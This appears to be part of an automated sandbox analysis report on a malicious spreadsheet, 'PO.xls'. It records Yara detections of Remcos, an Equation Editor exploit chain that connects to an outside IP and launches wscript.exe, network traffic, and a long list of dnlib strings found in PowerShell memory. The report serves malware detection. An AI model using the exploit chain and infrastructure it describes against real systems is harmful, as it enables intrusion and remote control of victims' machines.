                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4036, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3044, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: PO.xlsJoe Sandbox ML: detected
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,16_2_004338C8
                    Source: powershell.exe, 0000000E.00000002.474061036.0000000003389000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_a62cc2cc-e

                    Exploits

                    barindex
                    Source: Yara matchFile source: 16.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.6a480d8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.6a480d8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.474061036.0000000003389000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.476480463.00000000065E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4036, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3044, type: MEMORYSTR
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 104.168.32.148 Port: 80Jump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
                    Source: ~WRF{91BCF8F6-C2FD-4749-855D-C3013FC0B30C}.tmp.5.drStream path '_1788925055/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                    Source: ~WRF{91BCF8F6-C2FD-4749-855D-C3013FC0B30C}.tmp.5.drStream path '_1788925059/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                    Source: ~WRF{91BCF8F6-C2FD-4749-855D-C3013FC0B30C}.tmp.5.drStream path '_1788925080/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                    Source: ~WRF{91BCF8F6-C2FD-4749-855D-C3013FC0B30C}.tmp.5.drStream path '_1788925081/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                    Source: ~WRF{91BCF8F6-C2FD-4749-855D-C3013FC0B30C}.tmp.5.drStream path '_1788925084/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

                    Privilege Escalation

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00407538 _wcslen,CoGetObject,16_2_00407538
                    Source: unknownHTTPS traffic detected: 104.21.64.88:443 -> 192.168.2.22:49166 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 172.67.179.215:443 -> 192.168.2.22:49167 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 172.67.179.215:443 -> 192.168.2.22:49168 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.22:49173 version: TLS 1.0
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                    Source: unknownHTTPS traffic detected: 172.67.179.215:443 -> 192.168.2.22:49163 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.64.88:443 -> 192.168.2.22:49165 version: TLS 1.2
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000E.00000002.473517059.00000000009F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.473399421.0000000000339000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000E.00000002.473517059.00000000009F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.473399421.0000000000339000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.pdb source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
